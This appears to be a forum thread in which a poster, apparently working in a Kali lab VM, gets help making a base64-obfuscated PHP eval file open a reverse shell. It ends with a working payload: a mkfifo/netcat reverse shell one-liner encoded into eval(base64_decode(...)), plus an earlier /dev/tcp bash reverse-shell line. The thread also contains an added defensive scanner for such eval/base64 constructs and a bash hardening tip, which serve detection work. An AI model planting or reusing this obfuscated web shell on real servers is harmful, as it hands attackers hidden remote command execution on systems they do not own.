Using eval(base64_decode(''));

I’m trying to figure out how to execute a PHP file using the following code written in the file:

Where the contents within the quotes are a base64-encoded string. That string contains the payload:

<?php system('/bin/bash -i >& /dev/tcp/ 0>&1'); ?>

I’m testing this in my Kali VM using the following commands:

php -f test.php

The former simply echoes the explicit contents to the terminal: “eval(base64_decode…”

The latter shows the errors:

./test.php line 1: syntax error near the unexpected token `base64_decode'

./test.php line 1: `eval("base64-encoded-payload"));'

I’ve got a netcat listener set up on port 6666. Nothing happens. Can anyone point me in the right direction with this?

Some PHP script examples to show the execution of PHP script with eval function and bash script with system function:

$ cat script-A.php
<?php
 echo date("o-m-d"), ": this is php script code running\n";

$ php script-A.php
2022-10-07: this is php script code running

$ cat script-B.php
<?php
 echo "php starts bash\n";
 eval( "system(\"echo \$(date -I) : running bash script in eval function\");" );

$ php script-B.php
php starts bash
2022-10-07 : running bash script in eval function

$ cat script-C.php
<?php
 // assumed definition of $code (not shown in the original post): the base64 form
 // of the PHP statement that is echoed back below
 $code = base64_encode('system("echo $(date -I) : running bash script in eval function");');
 echo "php evaluates: ", base64_decode($code), "\n";
 eval( base64_decode($code) );

$ php script-C.php
php evaluates: system("echo $(date -I) : running bash script in eval function");
2022-10-07 : running bash script in eval function

The string in the eval function is PHP code to evaluate. The string contains no <?php and ?> around the PHP code.

1 Like
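As an added example (not part of the thread, and neither the original poster's nor the responder's code), here is a PHP script a defender can run over source files to surface what an eval(base64_decode("...")) call would actually execute, without evaluating it. It decodes each literal it finds and flags the ones that reference command-execution functions. The sample source it scans is constructed inline, and the function and constant names are my own.

```php
<?php
// Added example: static scanner for eval(base64_decode('<literal>')) constructs.
// It decodes the literal and reports whether the hidden code calls a function
// that hands control to a shell. Nothing found is ever eval'd by this script.

// Functions whose presence inside a decoded payload warrants an alert.
const SHELL_FUNCTIONS = ['system', 'exec', 'shell_exec', 'passthru', 'proc_open', 'popen'];

/**
 * Return one entry per eval(base64_decode('<literal>')) found in $source:
 * the source line, the decoded text (null if not valid base64) and the
 * shell-spawning functions the decoded text references.
 */
function scanEvalBase64(string $source): array
{
    // quote style is captured so the closing quote must match the opening one
    $pattern = '/eval\s*\(\s*base64_decode\s*\(\s*([\'"])([A-Za-z0-9+\/=\s]+)\1\s*\)\s*\)/i';
    $findings = [];
    if (preg_match_all($pattern, $source, $matches, PREG_OFFSET_CAPTURE) === 0) {
        return $findings;
    }
    foreach ($matches[2] as [$literal, $offset]) {
        // strict mode rejects text that merely resembles base64
        $decoded = base64_decode(preg_replace('/\s+/', '', $literal), true);
        $line = substr_count($source, "\n", 0, $offset) + 1;
        $calls = [];
        if ($decoded !== false) {
            foreach (SHELL_FUNCTIONS as $fn) {
                if (preg_match('/\b' . $fn . '\s*\(/i', $decoded)) {
                    $calls[] = $fn;
                }
            }
        }
        $findings[] = [
            'line'        => $line,
            'decoded'     => $decoded === false ? null : $decoded,
            'shell_calls' => $calls,
        ];
    }
    return $findings;
}

// Constructed sample input: two obfuscated eval calls, one harmless and one
// that would spawn a shell. Both literals are built here so the sample stays readable.
$harmless = base64_encode('echo "hello from eval";');
$spawning = base64_encode('system("id");');
$sample = "<?php\n"
    . "eval(base64_decode('{$harmless}'));\n"
    . "// ...\n"
    . "eval(base64_decode(\"{$spawning}\"));\n";

foreach (scanEvalBase64($sample) as $f) {
    printf("line %d: %s\n", $f['line'], $f['decoded'] ?? '<not valid base64>');
    if ($f['shell_calls']) {
        printf("  ALERT: calls %s\n", implode(', ', $f['shell_calls']));
    }
}
```

Run it with `php scan.php`; for the constructed sample it lists the decoded statement on lines 2 and 4 and raises an alert only for the second one. Pointing scanEvalBase64() at real files (file_get_contents() over a web root) turns the same logic into a quick triage pass, since the decoded text, not the base64 blob, is what tells you whether a finding is a web shell or a legitimate loader.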

Hey, I appreciate very much the examples you provided. It turns out I was using double PHP tags because of the ones in the payload itself, as your last comment suggested. Thank you.

The final result looks like:

echo "system('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 6666 > /tmp/f');" | base64 -w 0

I then copied the base64 string into a file as such:

<?php eval( base64_decode("c3lzdGVtKCdybSAvdG1wL2Y7IG1rZmlmbyAvdG1wL2Y7IGNhdCAvdG1wL2YgfCAvYmluL2Jhc2ggLWkgIDI+JjEgfCBuYyAxMC4wLjAuNSA2NjY2ID4gL3RtcC9mJyk7Cg==") ); ?>

The former shell using /dev/tcp didn’t work either, though. The piped version does.

/dev/tcp/host/port and also /dev/udp/host/port are interpreted by the bash shell. There exists no /dev/tcp in the virtual Unix file system.

Bash can be hardened with the option ‘disable-net-redirections’, so that bash does not interpret the /dev/tcp/... and /dev/udp/... special file names.

See: Installing Bash: Optional Features

Debian used this configuration up to version 4. Debian bash changelog 5.0

1 Like